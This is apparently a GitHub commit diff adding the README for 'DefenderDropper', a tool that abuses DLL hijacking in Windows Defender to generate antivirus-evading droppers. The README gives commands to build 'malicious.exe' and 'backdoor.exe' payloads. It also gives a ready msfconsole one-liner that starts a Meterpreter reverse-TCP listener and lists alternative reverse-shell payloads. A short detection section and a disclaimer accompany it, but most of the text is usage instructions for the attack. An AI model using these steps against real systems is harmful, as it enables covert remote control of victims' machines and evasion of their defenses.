|
1 | | -# DefenderDropper |
2 | | -Advanced DLL Hijacking Payload Generator Using Windows Defender Vulnerabilities |
| 1 | +# DefenderDropper |
| 2 | + |
| 3 | +**Advanced DLL Hijacking Payload Generator Using Windows Defender Vulnerabilities** |
| 4 | + |
| 5 | + |
| 6 | +[](https://python.org) |
| 7 | +[](https://metasploit.com) |
| 8 | +[](LICENSE) |
| 9 | + |
| 10 | +## Overview |
| 11 | + |
| 12 | +DefenderDropper is an advanced payload generation tool that leverages the DLL hijacking vulnerability in Windows Defender, originally discovered by [TwoSevenOneT](https://github.com/TwoSevenOneT/DefenderWrite). This tool automates the creation of sophisticated payloads that bypass security controls by hijacking legitimate Windows Defender processes. |
| 13 | + |
| 14 | +> **Inspired by**: [TwoSevenOneT/DefenderWrite](https://github.com/TwoSevenOneT/DefenderWrite) |
| 15 | +
|
| 16 | +## Features |
| 17 | + |
| 18 | +- **Windows Defender Exploitation**: Leverages DLL hijacking in Windows Defender |
| 19 | +- **Automated Payload Generation**: Creates ready-to-use droppers and DLLs |
| 20 | +- **Metasploit Integration**: Seamless integration with Meterpreter payloads |
| 21 | +- **Static Compilation**: No external dependencies required |
| 22 | +- **Stealth Execution**: Runs through legitimate system processes |
| 23 | +- **Multiple Payload Support**: Various reverse shell and Meterpreter options |
| 24 | + |
| 25 | +## Quick Start |
| 26 | + |
| 27 | +### Prerequisites |
| 28 | + |
| 29 | +```bash |
| 30 | +# Install dependencies on Debian/Kali |
| 31 | +sudo apt update |
| 32 | +sudo apt install python3 metasploit-framework mingw-w64 -y |
| 33 | +``` |
| 34 | +# Installation |
| 35 | +```bash |
| 36 | +git clone https://github.com/YourUsername/DefenderDropper.git |
| 37 | +cd DefenderDropper |
| 38 | +``` |
| 39 | + |
| 40 | +# Generate payload |
| 41 | +``` |
| 42 | +python3 defenderdropper.py 10.0.2.147 4443 -o malicious.exe |
| 43 | +``` |
| 44 | +# Start Metasploit listener |
| 45 | +``` |
| 46 | +msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST 10.0.2.147; set LPORT 4443; exploit' |
| 47 | +``` |
| 48 | + |
| 49 | +# How It Works |
| 50 | +Technical Overview |
| 51 | +DLL Hijacking: Exploits Windows Defender's vulnerable update process |
| 52 | + |
| 53 | +Process Injection: Injects shellcode into legitimate system processes |
| 54 | + |
| 55 | +Persistence: Leverages trusted Windows components for execution |
| 56 | + |
| 57 | +Evasion: Bypasses common security controls and antivirus solutions |
| 58 | + |
| 59 | +# Attack Flow |
| 60 | + |
| 61 | + |
| 62 | + |
| 63 | + |
| 64 | +# File Structure |
| 65 | +``` |
| 66 | +DefenderDropper/ |
| 67 | +├── defenderdropper.py # Main payload generator |
| 68 | +├── payload.exe # Generated dropper |
| 69 | +├── payload.dll # Shellcode DLL |
| 70 | +├── DefenderWrite.exe # Core exploit tool |
| 71 | +├── README.md |
| 72 | +└── LICENSE |
| 73 | +``` |
| 74 | +# Usage Examples |
| 75 | +Basic Meterpreter Payload |
| 76 | +```bash |
| 77 | +python3 defenderdropper.py 192.168.1.100 4444 -o backdoor.exe |
| 78 | +``` |
| 79 | + |
| 80 | + |
| 81 | +# Advanced Features |
| 82 | +Custom Payloads |
| 83 | + |
| 84 | +You can modify the generate_shellcode() function to use different Metasploit payloads, on defenderdropper.py search for windows/x64/meterpreter_reverse_tcp and replace it with other payloads: |
| 85 | + |
| 86 | +``` |
| 87 | +"-p", "windows/x64/shell_reverse_tcp", # Simple reverse shell |
| 88 | +"-p", "windows/meterpreter/reverse_https", # HTTPS payload |
| 89 | +"-p", "windows/x64/meterpreter/reverse_tcp", # Standard Meterpreter |
| 90 | +``` |
| 91 | + |
| 92 | +# Defense & Mitigation |
| 93 | +Detection |
| 94 | +Monitor for unusual msiexec.exe child processes |
| 95 | + |
| 96 | +Watch for DLL files in Windows Defender directory |
| 97 | + |
| 98 | +Analyze process hollowing techniques |
| 99 | + |
| 100 | +# Prevention |
| 101 | +Keep Windows Defender updated |
| 102 | + |
| 103 | +Implement application whitelisting |
| 104 | + |
| 105 | +Use advanced endpoint protection |
| 106 | + |
| 107 | +Regular security audits |
| 108 | + |
| 109 | +# Legal Disclaimer |
| 110 | +This tool is intended for: |
| 111 | + |
| 112 | + Security research |
| 113 | + |
| 114 | + Penetration testing with proper authorization |
| 115 | + |
| 116 | + Educational purposes |
| 117 | + |
| 118 | + Red team exercises |
| 119 | + |
| 120 | + Illegal use of this tool is strictly prohibited. The developers are not responsible for any misuse or damage caused by this tool. Always ensure you have explicit permission before testing any systems. |
| 121 | + |
| 122 | +# Contributing |
| 123 | +We welcome contributions from the security community! Feel free to: |
| 124 | + |
| 125 | +Fork the repository |
| 126 | + |
| 127 | +Create feature branches |
| 128 | + |
| 129 | +Submit pull requests |
| 130 | + |
| 131 | +Report issues and suggestions |
| 132 | + |
| 133 | +# Special Thanks |
| 134 | +TwoSevenOneT for the original DefenderWrite research |
| 135 | + |
| 136 | +The cybersecurity community for continuous improvement |
| 137 | + |
| 138 | +# License |
| 139 | +This project is licensed under the MIT License - see the [LICENSE](https://github.com/HackScaleTeam/DefenderDropper/LICENSE). file for details. |
| 140 | + |
| 141 | + Security is a shared responsibility. Use this tool wisely and ethically. |
| 142 | + |
| 143 | +Built with ❤️ for the cybersecurity community. Inspired by groundbreaking research from TwoSevenOneT. |
0 commit comments